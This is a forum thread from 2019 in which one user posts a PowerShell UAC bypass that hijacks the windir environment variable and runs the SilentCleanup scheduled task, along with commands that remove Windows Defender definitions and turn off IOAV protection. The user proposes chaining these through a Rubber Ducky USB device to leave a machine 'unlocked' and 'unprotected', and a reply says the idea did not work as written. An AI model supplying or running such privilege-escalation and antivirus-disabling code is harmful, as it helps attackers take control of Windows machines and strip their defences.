ramirez.r1214 Posted May 24, 2019 Posted May 24, 2019 So I had an Idea recently not sure if it'll work don't bash me on it but I was thinking about combining some of darrens videos and using a bad usb or a rubber ducky to not only bypass uac but turn off defender I been trying this for some time now trying this on my virtual box and windows 10 laptop.In one of his videos he shows Promptless UAC Bypass & Powershell Privilege Escalation. ~~~~~~~~~~~~~~~~~~~~~ if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator } else { $registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } ~~~~~~~~~~~~~~~~~~~~~~ (what I have learned from running this in a notepad then saving as a uac.ps1 but before executing the uac.ps1 you need to run "Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass" and select yes to avoid the "script is not signed" error) also using the code from Disabling Defender With Viss Episode 1 showed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "c\program files\windows defender\mpcmdrun.exe" -RemoveDefinitions -All set-MpPreference -DisableIOVProtection $true ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ disabling defender but it needs to be run in the admin CMD what I am thinking here is some how coding a rubber ducky in to first bypassing uac then disabling windows defender That way you can begin and have fun with your unlocked unprotected machine. Once again just an idea I have no clue if its possible or makes sense. But id really love to try.
xaveedra Posted November 10, 2019 Posted November 10, 2019 It's a brilliant idea but unfortunately didn't work unless for me I think the problem is the options weren't written in a proper way as the path too, It might work after modifying
Recommended Posts
Archived
This topic is now archived and is closed to further replies.